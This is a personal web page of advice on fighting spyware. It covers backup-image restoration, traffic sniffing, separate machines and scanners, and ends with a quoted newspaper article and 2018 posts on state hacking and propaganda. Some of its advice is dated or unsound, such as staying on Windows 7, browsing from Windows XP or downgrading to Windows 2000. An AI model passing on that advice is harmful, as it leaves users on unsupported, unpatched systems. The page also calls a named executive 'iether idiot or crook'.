Softpanorama

Home Switchboard Unix Administration Red Hat TCP/IP Networks Neoliberalism Toxic Managers
May the source be with you, but remember the KISS principle ;-)
Bigger doesn't imply better. Bigger often is a sign of obesity, of lost control, of overcomplexity, of cancerous cells

Fighting Spyware

News See also Recommended Links Recommended Books Big Uncle is Watching You Vault 7 scandal Non-scanner antispyware tools
Anti-spyware forums Softpanorama Malware Defense Strategy Spyware Scanners Malicious Web Sites Windows Defender Fighting PopUps with toolbars

Blocking lists

Sirefef.AV Win32/Tracur.AV W32/Sdbot-AAQ Win32-Rbot TDL4 Cryptolocker (Win32/Crilock.A) Flame
Trojan-GameThief.
Win32.OnLineGames2.an
Geraam Password Stealing Trojan Win32 Alureon Win32/Morto.A Duqu Trojan Flame Web Browsers Insecurity
Data Recovery Trojan XP Antivirus 2012 Dr Guard Antivirus System Pro Cryptolocker (Win32/Crilock.A AbetterInternet BHO
Identity theft Adding sites to the hosts file Phishing Fighting
HomePage Hijacking
History Humor Etc

Introduction

If you use Softpanorama Spyware removal strategy, you can remove most of spyware types  no matter how complex and sophisticated the infection method is.  The only exception is encryption based extortionware such as  Cryptolocker (Win32/Crilock.A)

Yes, spyware can be complex, extremely annoying and obnoxious as well as extremly difficult to remove (and latest banking and data encryption Trojans are a serious warning). Typically the period between malware gets into your computer and the moment it is detected by AV program installed can vary from hours to several weeks or even months.  For some not very popular and regional  (or highly specialized, "government sponsored", etc ) malware it can be years.

At the same time while protection of PC using scanning AV program is never enough,  paranoia about spyware is completely unwarranted. Despite tremendous increase in spyware complexity and capabilities in recent years, restoration of OS from a "healthy" C-drive image using a bootable CD created beforehand  on other (non-infected) computer is a sure way to defeat even the most complex spyware. One important lesson that extortionware such as  Cryptolocker (Win32/Crilock.A) taught is that there should always be two sets of backup (say A and B) and each week you should change from one set to another.  And that periodic backup to double layer DVD makes perfect sense if the size of your backup image is less then 8GB. Backup on a USB harddrives can be attacked, backup on DVD is in-penetratable after it was created.  Another method to defeat attempts of data-encryption Trojans to destroy your backups is to daily move of your current backup image via FTP or SCP to a different, Linux-based backup computer.

Using this "backup-based disinfection" is a three step approach. You can read about it at Softpanorama Malware Defense Strategy  Here is the contents:

Formally spyware is any software which uses an internet connection from your computer in the background (as "backchannel") operating without user knowledge or explicit permission. that definition actually includes a lot of modern commercial software. The presence of such a  backchannel represents a simple way to detect even the most sophisticated spyware and a TCP/IP sniffer often is an adequate tool for this.  For example, you can switch to other computer (and periodic switching between computers is another good practice, as it keeps you "reference image" tested and up-to-date) and see what communications exist on your "old" PC or laptop for a week or so using sniffer logs. That actually greatly helps against "spyware paranoia" (NSA under each bed ;-).  

Spyware is often connected with some way to get an advertising revenue, propagate spam or similar things. In few cases they try to steal and use your financial information (so called banking Trojans). And in very rare cases they want to monitor your activities. In any case now spyware became mostly "for profit" criminal business, and this type of criminals have enough money to pay developers and buy exploits.  That means that each new generation of spyware is more sophisticated then previous generations of malware. Interest to this type of programs from NSA and other three letter agencies does not help iether: the methods they develop using government funds and highly paid developers are eventually revealed and then flowing downhill from spooks to financial criminals. Story of malware used to damage Iranian uranium enrichment program is pretty instructive in this respect.  See Duqu Trojan, Flame and Stuxnet for more information. Just those three advanced 'state of the art" of spyware development considerably, creating essentially a "new era" in malware (as in "beforeStuxnet" and "after Stuxnet")

In any case we can safely assume that those days few spyware/adware programs are primitive and just uses one Run key to launch itself (and that removal of this key disinfects computer). 

Generally any use of an Internet "backchannel" connection should be preceded by a complete and truthful disclosure followed by the receipt of explicit, informed, consent for such use. Often spyware is disguised as a useful utility (atomic clock,  toolbar, free game or other useful utility). In this case the developer  does not disclose that in addition to openly stated function it is using PC Internet connection to send information about your activities or even your data to the third party. Typical connected information is the site you visited (WeatherBug is one classic example).

Often spyware deliberately complicates its removal from the computer or tried to reinstall itself by downloading missing components, if one component is removed. 

The spyware problem is not a pure Windows security problem. Situation is more complex. While the insecurity and architectural flaws of Windows operating system is a problem that aids malware in general, the channel for spreading spyware is usually Web and specifically Google search engine (which for some reason does not mark DNS names that are less then a month old -- many "waterhole spyware distribution sites" belong to this category.  We really need something for IE that blocks sites which has DNS registered less then a month or so ago.  OpenDNS is an interesting option is this respect.  Checking can be incorporated into DNS Prefetching:

The DNS Prefetch addon for Firefox enables DNS Prefetching which is a method of resolving and caching DNS lookups before you actually click on a link. DNS prefetching just resolves domain names before a user tries to navigate, so that there will be no effective user delay due to DNS resolution. One example where prefetching can help is when a user is looking at a page with many links to various other domains, for instance a search results page.

With DNS Prefetching, Firefox automatically scans the content of each page looking for links, extracting the domain name from each link, and resolving each domain to an IP address. All this work is done in parallel with the user's reading of the page. When a user clicks on any of these pre-resolved names to visit a new domain, they save an average of over 250ms in navigation.

Some potentially useful methods in protection

Spyware is a more serious problem than just a simple annoyance.  Your privacy is being invaded. That's why you should never store your taxes and banking data on the PC you use for browsing Internet.  Use a separate PC. This additional $300 investment is probably the best investment we can make to protect ourselves from viruses and trojans stealing our financial data.  If you have enough technical knowledge you can use two different virtual machine images on the same computer.  I also would not recommend to store copies of your bank account password in the browser.  Spyware has the ability to install additional software in your machine without your consent that can download this information and decrypt it.  Also just the fact that you are doing on your computer is being watched by unknown third party right now does not provides any comfort. although you need to understand that browsing Internet is no longer anonymous activity, unless you use VPN or similar methods.  Now logs of all your visits are stored somewhere, at least temporary.  And usually not only of the sites that you visited. Advertizing plugins such as used by Google also store this information unless you disable Javascript from running or block them in some other way.  And advertizing vendors developed sophisticated methods to track your identity even if you disable or periodically destroy all cookies. Just try to change your browsing session from one computer to another and see that advertizing reflect you previous activity.

Email spam and deceptive advertising of sites via Google or other search engine is still the major channels of penetration of  spyware into PCs. Google search results is especially nasty and effective channel.  Be careful not to get into "grey zone" site on the PC that you use for your daily work. If you can't live without browsing grey areas of Internet, buy a Goggle Chomebook (such Acer C720 11.6" Chromebook)  or Android tablet and browse those areas exclusively from them . Or install Ubuntu on one of your old PCs.  Using a different Os then Windows represent an additional lawyer of protection --  most attacks are still directed toward Windows users and PC with Intel-compatible CPUs and Windows XP-Windows 7-Windows 10 installed.  Using a different OS and/or CPU architecture gives you substantial additional protection via  "security via obscurity" effect. 

Spyware authors like virus authors look for a particular category of gullible and greedy users: despite all this bad experience  some people  just can't avoid clicking on  a "Get Kool Mouse Pointerz Here" or "Free Microsoft Office 2013" type of links iether in search results or email  ;-).  Using a email client that disables all "rich content" and hides attachments such as Thunderbird proves you with free and effective layer of protection against such threats.

Spyware authors like virus authors look for a particular category of gullible and greedy users: despite all this bad experience  some people  just can't avoid clicking on  a "Get Kool Mouse Pointerz Here" or "Free Microsoft Office 2013" type of links iether in search results or email  ;-).  Using a email client that disables all "rich content" and hides attachments such as Thunderbird proves you with free and effective layer of protection against such threats.

An ounce of prevention is worth a pound of cure. Here are some potentially useful methods for those who are using IE Internet browser:

  1. Do not upgrade to versions of Microsoft OS higher then Windows 7. After Windows 7 Microsoft itself went into spyware business in full force. for example now they want to to authenticate to your Pc using hotmail account. Which essentially gives them free information when and how you use your PC. Although you can enhance your privacy using specific privacy settings windows 10 (see for example 5 Tips to Increase Your Privacy With Windows 10  Matthew Held or just serach "how to enhance windows 10 privacy" in any search engine you use) it is definitely more intrusive "by design" then Windows 7. Probably by at least a factor.
  2. Treat your C drive as disposable. Learn to periodically wipe out your Windows C drive and restore it from "trusted" backup kept on write protected harddrive or USB drive. This idea of periodic wipe out and reinstallation of some trusted image is simple, and very effective method of fighting complex spyware including government sponsored spyware (as this would destroy Microsoft brand, Microsoft brass probably will try to avoid allowing using Microsoft updates for installing government spyware, unless this is the case connected with national security (which is a very brad notion those days); but government agencies (and not only them) can definitely use update channels of other vendors -- typical windows installation usually contains at least a dozen of commercial programs each with its own update channel. Which easily can be compromised making such computer one big security hole, no matter which AV program you use.  This method is  especially attractive for small companies, who do not have dedicated security staff to watch for windows threats. And it eliminates the need to spend money on commercial AV (free Microsoft Security Essentials are "good enough" in this case). Also in this case you do not need to worry about unending, stupid and dangerous patches of Adobe Reader and other crapware.   Microsoft will reapply patches and if you use drive other then C for your files there is not much to do after the reinstallation. Other patches can be ignored as shelf-life of this instance is limited. If they are needed apply it to trusted image first.  Minimal adjustments required can be scripted using PowerShell or whatever tool you are comfortable with.
  3. Use two virtual instances of OS or at least two browsers with Microsoft IE set to high security level and used for browsing of unknown sites. The key in protections of  your browser against new web threats is disabling JavaScript and ActiveX.  there are aos some utilities that can enhance level of securyt in this area but I do not follow this area closely. Long ago Trend Micro USA provided Browser Guard -  a free utility which uses advanced heuristics and emulation technologies to detect Javascript exploits. But it is better to disable Javascript altogether for "grey areas" browsing. The latest version (2011) included detection enhancement for Web Trojans, and for tracing infection chains. But using a virtual machine is a much better deal.
  4. Use DNS server that protects from "new and hot" sites -- many malware distribution sites are less then 6 months old despite the fact that they are high in Google searches for certain keywords. Just blocking sites which are "younger" then six month stop a lot of Trojans cold. One possibility is OpenDNS
  5. Install a router based firewall with Internet filter or free K9 Web ProtectionIt you know Linux you can use Linux based router and tune it to prevent any re-infections. 
  6. If you have Linux know-how, install and use squid proxy on a separate PC. 
  7. Practice "separation of duties" policy with a cheap Chromebook laptop or separate instance of virtual OS launched as virtual machine. You should use virtual machine capabilities of Windows 7  and install "disposable" version of windows XP. You can do all the browsing in it.  It does not prevent you from getting spyware (and encryption malware still can encrypt your data) but 99% level achieved by wiping out your "used" image is good enough level to make this a worthwhile technique. If you know Linux you can use a Linux instance for browsing instead of XP. Linux has its own exploits but it stops dead all Windows exploits without any patching. Both GUI and browser (Firefox) are quite usable.   You can also downgrade your Windows to Windows 2000. Modern exploits react badly on such an old version of OS.
  8. Never do "leisure" browsing from the account with admin privileges. Create yet another account and use only it for browsing the Web. When you browsing unknown sites run IE only under some regular user account that can't write to the registry (use "Switch user" option -- it's really fast and convenient, although most users never tried it). Starting with Windows Vista and Windows 7, Microsoft introduced User Account Control (UAC), which, when enabled, allowed users to run with least user privileges. This scenario limits the possibility of attacks by malware and other threats that require administrative privileges to run. 

    You can configure UAC in your computer to meet your preferences:

  9. Add all sites that you deem suspicious to Restricted zone in IE. You can do it before clicking on the link in Google by creating a macro with a programmable keyboard  such as Logitech G510s gaming keyboard  or Sidewinder X4.

    If you detected spyware on your computer before removal look at the network connections the computer uses and try to "cut an oxygen" by adding sites that it accesses to hosts file and to the restricted zone. That might helps to prevent re-infections

  10. If you install trial version of software use "Try and Forget" software to eliminate those guest as they not always deinstall themselves completely.  Avoid "trial" versions as they can overburden you computer with unnecessary or harmful components and might not de-install cleanly, presenting the same danger as spyware (hidden channel to the vendor). There are a couple vendors that provide "try and forget" environment. One such environment is provided by Acronis True Image Try&Decide feature

    Acronis True Image

    You can run your system in a special try mode with the Try&Decide feature. In this mode you can try out new applications or experiment with the system while being sure that you can always discard the changes made to the system and revert it back to the state it was just before turning on the Try&Decide mode.

    When you turn on the Try&Decide mode, the product activates a special Acronis driver, which starts reading all requests to the protected partition and forwards these to the storage location you have selected.

  11. Install Microsoft Security Essentials which are free and contain some real time protection components. While this gives you a minimal level of protection is better then nothing and actually not much worse (and probably has less harmful components) then paid version of MacAfee, Symantec and such. Being mostly signature based tool like any signature based tool they are not very effective and you can be infected with any spyware that is not yet in their database, but still they are better then nothing and in my opinion are better than many of commercial AV tools. Also with time even new spyware became old and will be detected and hopefully correctly disinfected. 

High level of paranoia about spyware in mainstream press

Unless you are targeted by government agencies spyware can be eliminated.  If you use separate PC for vital tasks chance to get spyware on this "more secure"  PC is really small. Using several virtual machines on 8GB laptop is no-brainer and also provides a reasonably high level of protection (many types of advanced spyware detect the presence of VM environments and refuse to run on it, fearing that they are "watched"/analysed ) .

Still there is high level of paranoia about spyware in mainstream press. Sometimes it reaches a really stupid level of "if your computer is infected discard it and get a new one". A pretty telling example of this paranoia was a  NYT article  By MATT RICHTEL and JOHN MARKOFF "Corrupted PC's Find New Home in the Dumpster" (July 17, 2005 ).  The main hero of this article (who claim to holds PhD in computer science) demonstrates simply amazing level of ignorance of Windows OS (unless this was just a pretext to upgrade his old computer ;-)

SAN FRANCISCO, July 15 - Add personal computers to the list of throwaways in the disposable society.

On a recent Sunday morning when Lew Tucker's Dell desktop computer was overrun by spyware and adware - stealth software that delivers intrusive advertising messages and even gathers data from the user's machine - he did not simply get rid of the offending programs. He threw out the whole computer.

Mr. Tucker, an Internet industry executive who holds a Ph.D. in computer science, decided that rather than take the time to remove the offending software, he would spend $400 on a new machine.

He is not alone in his surrender in the face of growing legions of digital pests, not only adware and spyware but computer viruses and other Internet-borne infections as well. Many PC owners are simply replacing embattled machines rather than fixing them.

"I was spending time every week trying to keep the machine free of viruses and worms," said Mr. Tucker, a vice president of Salesforce.com, a Web services firm based here. "I was losing the battle. It was cheaper and faster to go to the store and buy a low-end PC."

In the face of a constant stream of pop-up ads, malfunctioning programs and performance slowed to a crawl or a crash - the hallmarks of spyware and adware - throwing out a computer "is a rational response," said Lee Rainie, director of the Pew Internet and American Life Project, a Washington-based research group that studies the Internet's social impact.

While no figures are available on the ranks of those jettisoning their PC's, the scourge of unwanted software is widely felt. This month the Pew group published a study in which 43 percent of the 2,001 adult Internet users polled said they had been confronted with spyware or adware, collectively known as malware. Forty-eight percent said they had stopped visiting Web sites that might deposit unwanted programs on their PC's.

Moreover, 68 percent said they had had computer trouble in the last year consistent with the problems caused by spyware or adware, though 60 percent of those were unsure of the problems' origins. Twenty percent of those who tried to fix the problem said it had not been solved; among those who spent money seeking a remedy, the average outlay was $129.

By comparison, it is possible to buy a new computer, including a monitor, for less than $500, though more powerful systems can cost considerably more.

Meantime, the threats from infection continue to rise, and "the arms race seems to have tilted toward the bad guys," Mr. Rainie said.

The number of viruses has more than doubled in just the last six months, while the number of adware and spyware programs has roughly quadrupled during the same period, said Vincent Weafer, a senior director at Symantec, which makes the Norton computer security programs. One reason for the explosion, Symantec executives say, is the growth of high-speed Internet access, which allows people to stay connected to the Internet constantly but creates more opportunity for malicious programs to find their way onto machines.

Mr. Weafer said an area of particular concern was infections adept at burying themselves in a computer system so that the cleansing programs had trouble finding them. The removal of these programs must often be done manually, requiring greater technical expertise.

There are methods of protecting computers from infection through antivirus and spyware-removal software and digital barriers called firewalls, but those tools are far from being completely effective.

"Things are spinning out of control," said David Gelernter, a professor of computer science at Yale.

Mr. Gelernter said his own family's computer became so badly infected that he bought a new one this week. He said his two teenage sons were balking at spending the hours needed to scrub the old one clean of viruses, worms and adware.

Mr. Gelernter blames the software industry for the morass, noting that people are increasingly unwilling to take out their "software tweezers" to clean their machines.

Microsoft executives say they decided to enter the anti-spyware business earlier this year after realizing the extent of the problem.

"We saw that a significant percentage of crashes and other problems were being caused by this," said Paul Bryan, an executive in the company's security business unit. Windows XP Service Pack 2, an upgrade to the latest Windows operating system that has been distributed to more than 200 million computers, includes an automated malware removal program that has been used 800 million times this year, he said.

At least another 10 million copies of a test version of the company's spyware removal program have been downloaded. Yet Microsoft executives acknowledged that they were not providing protection for people who have earlier versions of the company's operating system. And that provides little comfort for those who must navigate the perils of cyberspace.

Terrelea Wong's old computer now sits beside her sofa in the living room, unused, except as a makeshift table that holds a box of tissues.

Ms. Wong, a physician at Kaiser Permanente Medical Center in South San Francisco, started getting a relentless stream of pop-up ads a year ago on her four-year-old Hewlett-Packard desktop computer. Often her entire screen would turn blue and urge her to "hit any key to continue." Sometimes the computer would freeze altogether.

After putting up with the problem for months, Ms. Wong said she decided last November that rather than fix her PC, she would buy a new one. Succumbing to the seduction of all the new bells and whistles, she spent $3,000 on a new Apple laptop.

She is instituting new rules to keep her home computer virus-free.

"I've modified my behavior. I'm not letting my friends borrow my computer," she said, after speculating that the indiscriminate use of the Internet by her and her friends had led to the infection problems.

Peter Randol, 45, a stockbroker for Charles Schwab in Denver, is at his wits' end, too. His family's four-year-old Dell computer has not been the same since last year when they got a digital subscriber line for high-speed Internet access. Mr. Randol said the PC's performance has slowed, a result he attributes to dozens of malicious programs he has discovered on the computer.

He has eliminated some of the programs, but error messages continue to pop up on his screen, and the computer can be agonizingly slow.

"I may have no choice but to buy a new one," he said, noting that he hopes that by starting over, he can get a computer that will be more impervious to infection.

Buying a new computer is not always an antidote. Bora Ozturk, 33, who manages bank branches in San Francisco, bought a $900 Hewlett-Packard computer last year only to have it nearly paralyzed three months ago with infections that he believes he got from visiting Turkish news sites.

He debated throwing the PC out, but it had pictures of his newborn son and all of his music files. He decided to fix it himself, spending 15 hours learning what to do, then saving all his pictures and music to a disk and then wiping the hard drive clean - the equivalent of starting over.

For his part, Mr. Tucker, the Salesforce.com executive, said the first piece of software he installed on the new machine two weeks ago was antivirus software. He does not want a replay of his frustrations the last month, when the attacks on his old machine became relentless.

"It came down to the simple human fact that maintaining the old computer didn't pay," he said.

If we assume that "Mr. Tucker, an Internet industry executive who holds a Ph.D."  holds Ph.D in computer science, it is clear that he is iether idiot or crook.  With all due respect to this Ph.D holder I think that any holder of associate or bachelor degree in computer science should be able to reinstall Windows OS. Moreover even bachelor degree in computer science presuppose some interest and level of understanding of OS internals and TCP/IP networking ;-).

But there is some rational in this naive and deceptive NYT drivel: having a second computer helps to fight spyware. Used computer of decent quality can be bought for less then $200 on eBay. By having a second computer you can switch to it and continue your work instead of frantically trying to disinfect the current machine. Actually the most damaging to your data blunders are done not by viruses or Trojans but by users who try to fix the computer and do not fully understand the consequences of their action. In a way classic scenario of Sysadmin Horror Stories which is so intimately known by any Unix sysadmin is replaced here with a different OS and different players.

Beware too greedy AV vendors

Beware AV vendors that try to create hysteria and profit from it. In my opinion both Symantec and McAfee lost track and  use "gray" methods of increasing sales of their, generally speaking, mediocre products. Microsoft Security Essentials and other similar free AV programs while far from being perfect are good enough for most users and money spend of McAfee should generally be spend on buying better backup drives and such.

Generally there are strange bedfellows in this spyware business. See Jesse Willms Settles in Court with Google – a Google Win against the Scammers Strangely Perfect

Factory installed image as a spyware protection tool

Actually cleaning spyware it's not a rocket science as you always can restore OS from a healthy image or reinstall Windows and software and then merge your data with this image.

In all, even the most complex cases of spyware infection, reinstallation from a "healthy" disk image works perfectly well and for anybody who is professional in the field (and not a lazy misfit with CS degree who has no backups and does not know what is installed on his/her computer) should take less an hour. I doubt that anyone can find a  plausible case when you cannot clean spyware by reinstallation. But I encourage you to try and submit such case in a letter to the editor of Softpanorama.

Most vendors now provide a special partition with the image of initially installed Windows 7 or Windows 8  as well as ordered with PC software such as Microsoft Office (factory install image).  The manual always has a special chapter about restoring the image where description is understandable for everybody with an average IQ ;-). If it's to bad y ou can always call vendor and they are quite helpful.

For the guys who assemble computer themselves the same idea works as well: they should be able to create additional partition and  "initial image" using free version of Acronis True Image (for Seagate and Western digital drives) or any other similar utility.

Signs that you are infected

Not all spyware produces any signs that you are infected. For obvious reasons banking Trojans do not.

But many other types of spyware do produced to signs. If you are seeing new toolbars in your browser, excessive popups, or your homepage has been switched, or more commonly PC became very slow or periodically reboot itself or crashes chances are that you are infected.  Other typical symptoms:

  • changed search results
  • changed advertisements of pages that you browse
  • IE periodically crashes
  • Computer freezes and keyboard became irresponsive.
  • Loss of Internet connectivity

Prominent groups of spyware

There are several prominent groups of spyware:

Scanner based methods of detecting spyware

Free AV scanner such a Microsoft security essentials is a useful first layer of defense. It is easily breached and can't be relied upon but  nevertheless it is unreasonable not to use a free scanning software for detection. See  Spyware Scanners. This is important as not all spyware has obvious signs and reveals itself in changing the behavior of the computer of IE or both. Businesses which want an inexpensive software tool that can be used to clean up a Spyware infection on a one-time basis should use free Microsoft Security Essentials which  Windows compatibility wise is better,  not worse then expensive ( and redundant) solutions from Symantec (junk), McAfee (semi-junk) and other AV vendors. And as for spyware detection they all are at best mediocre. You might be lucky and you might be not but generally it can be three or more months before they will include particular malware that infected your PC into their signature databases.

Microsoft provides free spyware scanner (actually 10 days copy of Microsoft Security essentials)  That I recommend to try first.

If you see some suspicious files detected by free scan or files in " C:\Documents and Settings\dell\Local Settings\Temp\" that you can't delete you can use free service called VirusTotal which allow to submit sample and run it over more then two dozens of AV tools. It produce some useful results and is best of the breed as of 2012.

AV vendors are just an overhead caused by flaws in Microsoft Windows design. For example Microsoft program loader is junk, signing executables is an option (Authencode), but it is rarely used (With Security set to High, no potentially dangerous content will be run, signed or unsigned). Ability to tell the source of the program in Windows is almost non-existent. System files are scattered in really messy fashion and Windows directory is a big mess. Registry is another mess which provides tremendous amount of ways to launch rogue programs.  

In any case free spyware scanners are simple and yet effective against almost all but the most complex spyware.  And that's why they should be tried first. There are two prominent free Spyware scanners (Adaware and  Spybot S&D).  Spybot S&D usage is discussed in a separate page.

The main problem with of the Spyware scanners is that Spyware is repeating the path of file viruses and newer variants are designed with the specific mechanism to aviod detection by the scanners (polymorthic spyware). One early example of this trend was  vx2 Spyware (SAHAgent, aka Golden Retriever, ShopAtHome and ShopAtHomeSelect). Another early example was CoolWebSearch or ‘CWS’ as many refer to it.  With more the a hundred know variants CWS has surpassed most other spyware in sophistication of the infection and dificulty of removal.

In any case it does not make sense to spend money of commersial spyware scanner. It is batter to bye a USB drive and a good backup tool like Acronis. 

Please be aware that you need to check the reputation of the product before downloading it. Some spyware mask itself as AV product and is installed on your PC without your permission., After that it produced fake report about multiple infections found to scare you into registering the product.  An early example of this trend was Antivirus system pro. A more recent example is XP Antivirus 2012  Such product is essentially an extortion scheme designed to exploit the fear of infection for financial gain.

Non-scanner-based Detection Strategies

While analyzing network traffic is the best way to detect spyware, the non-scanner based strategies of fighting spyware includes several additional lines of defense:

  1. Hijackthis and similar tools which can provide a useful baseline that includes integrated list of relevant registry entries and a process map,   but currently I do not know how to run it in a batch mode (other then via Expect).   Still this is the simplest way of manual creation of a useful baseline. It you are reading this page and do not yet have a problem, please create at least a process baseline. It might turn to be extremely helpful in the future. using. You cannot overestimate the value of  the baseline in fighting complex Spyware beasts.
     
  2. Integrity checkers that provide snapshot of critical directories on you C-drive after each reboot. There are several such directories such as C:\windows  C:\Windows\System32, etc.  
  3. Using internet proxy.  Those who have Linux skill can use Squid proxy.

Top Visited
Switchboard
Latest
Past week
Past month

NEWS CONTENTS

Old News ;-)

[Oct 11, 2018] Insidious propaganda attack on Taiwan manufactures by Western MSM

Oct 11, 2018 | thenewkremlinstooge.wordpress.com

et Al October 5, 2018 at 4:00 am

The Register: Decoding the Chinese Super Micro super spy-chip super-scandal: What do we know – and who is telling the truth?
https://www.theregister.co.uk/2018/10/04/supermicro_bloomberg/

Who's your money on? Bloomberg's sources? Apple? Amazon? Super Micro?

####

Hit the comments. Quite a few very good points made, namely 'Why now?' (its da Chinese!) as it supposed occurred some years ago, the US breaks this kind of story when it knows it will shortly be fingered for doing the same (the US did a demo SCADA attack for the media before the STUXNET story broke), if it was done it would have only been on select machines etc. etc.

Euractiv: Apple, Amazon deny Bloomberg report on Chinese hardware attack
https://www.euractiv.com/section/cybersecurity/news/apple-amazon-deny-bloomberg-report-on-chinese-hardware-attack/

There was a headlining (which of course I cannot find now*) saying that the US is calling on the UK, EU & Japan should get together and take on China economically. Why does the might US need help? It's quite an admission. This is at the same time that the US is targeting EU companies that do business with Russia and also telling Brussels that they do not agree with its very modest proposals for WTO reform.** There's no balance. They're all over the place, no to mention their spokespersons going tonto and shooting off their mouths so casually (US NATO Amb).

The more you look at all the current revelations, who they are made by, the way they are all being fed to the press and the demands now being made, it looks more and more that the Euro-Atfantacists are making another concerted and desperate campaign to retain some sort of influence. The UK is leaving the EU. Even if it rejoins, it won't be a 'special partner'. The fact that the USA-insane Netherlands and the UK are running their stories together shows us that the target is the rest of Europe, just as outgoing Pres of the EU J-C Juncker has said that Europe's best interests are with a security treaty with Russia. BTW, Finland's Stubb is putting himself forward to replace Juncker

* et voila! US, EU should 'clean the house' and deal with China – US ambassador
https://www.euractiv.com/section/eu-china/news/us-eu-should-clean-the-house-and-deal-with-china-us-ambassador/

** US says it cannot support some of EU's ideas for WTO reform
https://www.euractiv.com/section/economy-jobs/news/us-says-it-cannot-support-some-of-eus-ideas-for-wto-reform/

[Oct 08, 2018] Hacking and Propaganda by Marcus Ranum

Highly recommended!
Notable quotes:
"... There has been an ongoing campaign on the part of the US, to get out the idea that China, Russia, North Korea, and Iran have massive armies of hackers that are constantly looking to steal American secrets. The absurdity of the US' claims is pretty obvious. As I pointed out in my book The Myth of Homeland Security ..."
"... "The Great US/China Cyberwar of 2010" is one cyberwar that didn't happen, but was presaged with a run-up of lots of claims that the Chinese were hacking all over the place. I'm perfectly willing to accept the possibility that there was Chinese hacking activity, but in the industry there was no indication of an additional level of attack or significance. ..."
"... One thing that did ..."
"... US ideology is that "we don't start wars" -- it's always looking for an excuse to go to war under the rubric of self-defense, so I see these sorts of claims as justification in advance for unilateral action. I also see it as a sign of weakness; if the US were truly the superpower it claims it is, it would simply accept its imperial mantle and stop bothering to try to justify anything. I'm afraid we may be getting close to that point. ..."
"... My assumption has always been that the US is projecting its own actions on other nations. At the time when the US was talking the loudest about Chinese cyberwar, the US and Israel had launched STUXNET against the Iranian enrichment plant at Natanz, and the breeder reactor at Bushehr (which happens to be just outside of a large city; the attack took some of its control systems and backup generators offline). Attacks on nuclear power facilities are a war crime under international humanitarian law, which framework the US is signatory to but has not committed to actually follow. This sort of activity happens at the same time that the US distributes talking-points to the media about the danger of Russian hackers crashing the US power grid. I don't think we can psychoanalyze an entire government and I think psychoanalysis is mostly nonsense -- but it's tempting to accuse the US of "projection." ..."
"... All of this stuff happens against the backdrop of Klein, Binney, Snowden, and the Vault 7 revelations, as well as solid attribution identifying the NSA as "equation group" and linking the code-tree of NSA-developed malware to STUXNET, FLAME, and DUQU. ..."
"... the US has even admitted to deploying STUXNET -- Obama bragged about it. When Snowden's revelations outlined how the NSA had eavesdropped on Angela Merkel's cellphone, the Germans expressed shock and Barack Obama remarkably truthfully said "that's how these things are done" and blew the whole thing off by saying that the NSA wasn't eavesdropping on Merkel any more. [ bbc ] ..."
"... It's hard to keep score because everything is pretty vague, but it sounds like the US has been dramatically out-spending and out-acting the other nations that it accuses of being prepared for cyberwar. ..."
"... it's hard not to see the US is prepared for cyberwar, when both the NSA and the CIA leak massive collections of advanced tools. ..."
"... My observation is that the NSA and CIA have been horribly sloppy and have clearly spent a gigantic amount of money preparing to compromise both foreign and domestic systems -- that's bad enough. With friends like the NSA and CIA, who needs Russians and Chinese? ..."
"... The Russian and Chinese efforts are relatively tiny compared to the massive efforts the US expends tens of billions of dollars on. The US spends about $50bn on its intelligence agencies, while the entire Russian Department of Defense budget is about $90bn (China is around $139bn) -- maybe the Russians and Chinese have such a small footprint because they are much smaller operations? ..."
"... That brings us to the recent kerfuffle about taps on the Supermicro motherboards. That's not unbelievable at all -- not in a world where we discover that Intel has built a parallel management CPU into every CPU since 2008, and that there is solid indications that other processors have similar backdoors. ..."
"... There are probably so many backdoors in our systems that it's a miracle it works at all. ..."
"... So, with respect to "propaganda" I would say that the US intelligence community has been consistently pushing a propaganda agenda against the US government, and the citizens in order to justify its actions and defend its budget. ..."
"... What little I've been able to find out the new Trump™ cybersecurity plan is that it doesn't involve any defense, just massive retribution against (perceived) foes. ..."
"... Funny how those obsessed with "false flag" operations work so hard to invite more of same. ..."
Oct 07, 2018 | freethoughtblogs.com

Bob Moore asks me to comment on an article about propaganda and security/intelligence. [ article ] This is going to be a mixture of opinion and references to facts; I'll try to be clear which is which.

Yesterday several NATO countries ran a concerted propaganda campaign against Russia. The context for it was a NATO summit in which the U.S. presses for an intensified cyberwar against NATO's preferred enemy.

On the same day another coordinated campaign targeted China. It is aimed against China's development of computer chip manufacturing further up the value chain. Related to this is U.S. pressure on Taiwan, a leading chip manufacturer, to cut its ties with its big motherland.

It is true that the US periodically makes a big push regarding "messaging" about hacking. Whether or not it constitutes a "propaganda campaign" depends on how we choose to interpret things and the labels we attach to them -- "propaganda campaign" has a lot of negative connotations and one person's "outreach effort" is an other's "propaganda." An ultra-nationalist or an authoritarian submissive who takes the government's word for anything would call it "outreach."

There has been an ongoing campaign on the part of the US, to get out the idea that China, Russia, North Korea, and Iran have massive armies of hackers that are constantly looking to steal American secrets. The absurdity of the US' claims is pretty obvious. As I pointed out in my book The Myth of Homeland Security (2004) [ wc ] claims such as that the Chinese had "40,000 highly trained hackers" are flat-out absurd and ignore the reality of hacking; that's four army corps. Hackers don't engage in "human wave" attacks.

"The Great US/China Cyberwar of 2010" is one cyberwar that didn't happen, but was presaged with a run-up of lots of claims that the Chinese were hacking all over the place. I'm perfectly willing to accept the possibility that there was Chinese hacking activity, but in the industry there was no indication of an additional level of attack or significance.

One thing that did happen in 2010 around the same time as the nonexistent cyberwar was China and Russia proposed trilateral talks with the US to attempt to define appropriate limits on state-sponsored hacking. The US flatly rejected the proposal, but there was virtually no coverage of that in the US media at the time. The UN also called for a cyberwar treaty framework, and the effort was killed by the US. [ wired ] What's fascinating and incomprehensible to me is that, whenever the US feels that its ability to claim pre-emptive cyberwar is challenged, it responds with a wave of claims about Chinese (or Russian or North Korean) cyberwar aggression.

John Negroponte, former director of US intelligence, said intelligence agencies in the major powers would be the first to "express reservations" about such an accord.

US ideology is that "we don't start wars" -- it's always looking for an excuse to go to war under the rubric of self-defense, so I see these sorts of claims as justification in advance for unilateral action. I also see it as a sign of weakness; if the US were truly the superpower it claims it is, it would simply accept its imperial mantle and stop bothering to try to justify anything. I'm afraid we may be getting close to that point.

